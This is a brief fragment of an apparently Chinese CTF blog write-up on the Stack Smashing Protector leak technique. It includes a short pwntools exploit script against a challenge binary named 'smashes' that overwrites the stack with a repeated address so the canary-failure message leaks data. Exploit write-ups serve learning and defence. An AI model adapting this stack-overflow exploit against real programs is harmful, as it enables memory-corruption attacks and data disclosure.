Stack Smashing Protector(SSP) leak 觉得自己不能再补充了大佬博客 EXP 12345678 from pwn import *p=process("./smashes")payload=p64(0x400d21)*150p.sendline(payload)p.interactive() 赞微海报分享
近期评论